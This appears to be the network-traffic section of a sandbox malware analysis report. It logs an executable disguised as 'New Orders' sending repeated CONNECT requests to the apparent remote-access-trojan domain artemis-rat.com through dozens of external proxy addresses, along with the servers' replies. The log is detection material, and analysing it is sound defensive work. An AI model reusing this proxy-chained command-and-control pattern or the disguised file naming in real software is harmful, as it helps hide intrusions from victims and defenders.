                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        363192.168.2.95097231.43.158.10888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.563313961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        364192.168.2.95105969.75.140.15780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.563617945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.811183929 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        365192.168.2.950927103.190.54.14180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.563875914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        366192.168.2.950327203.243.63.16807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.563941002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.908827066 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        367192.168.2.950412198.12.255.19368217672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.564126968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.663921118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.668406010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.773282051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        368192.168.2.951028199.102.104.7041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.564186096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        369192.168.2.95103667.213.210.118587037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.564290047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.889810085 CET24INHTTP/1.1 200 #string


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        370192.168.2.95040951.79.87.144417467672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.564358950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.599036932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.617048979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.723223925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.742130995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        371192.168.2.951082107.180.103.214616347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.564702034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.132533073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.733673096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824109077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.835912943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.945513010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.945276022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.835846901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.648745060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        372192.168.2.950908124.163.236.5473027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.564910889 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:42.538739920 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:43.026551962 CET90INHTTP/1.1 200 OK
                                                                                        Content-Type: application/json
                                                                                        Connection: close
                                                                                        Content-Length: 55


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        373192.168.2.951049194.4.50.61123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.564989090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        374192.168.2.95032395.84.166.13880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.565032005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        375192.168.2.951088154.208.10.126807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.565084934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.789259911 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.23.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        376192.168.2.950204102.23.234.20180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.565901995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.663940907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        377192.168.2.950357201.71.3.429997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.565957069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.599064112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.685961962 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        378192.168.2.95106366.45.246.19488887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.566140890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        379192.168.2.95040636.92.193.189807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.566540956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.509622097 CET818INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: Apache
                                                                                        Vary: accept-language,accept-charset
                                                                                        Accept-Ranges: bytes
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Language: en
                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 69 6e 66 6f 40 72 73 68 62 2d 6c 61 6d 70 75 6e 67 2e 63 6f 2e 69 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21
                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Server error!</title><link rev="made" href="mailto:info@rshb-lampung.co.id" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Server error!
                                                                                        Mar 11, 2024 16:16:43.509783030 CET461INData Raw: 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 61 6e 64 20 77 61 73 20 0d 0a 20 20 20 20 75
                                                                                        Data Ascii: </h1><p> The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there was an error in a CGI script. </p><p>If you think this is a server err


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        380192.168.2.95105837.148.217.2349997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.566595078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.905446053 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        381192.168.2.951109104.16.224.33807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.566660881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.721920967 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        382192.168.2.950336103.48.68.101837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.566740036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.663939953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.162470102 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        383192.168.2.951097138.68.60.831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.566816092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.906874895 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        384192.168.2.951119162.159.242.10807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.566929102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.727967978 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


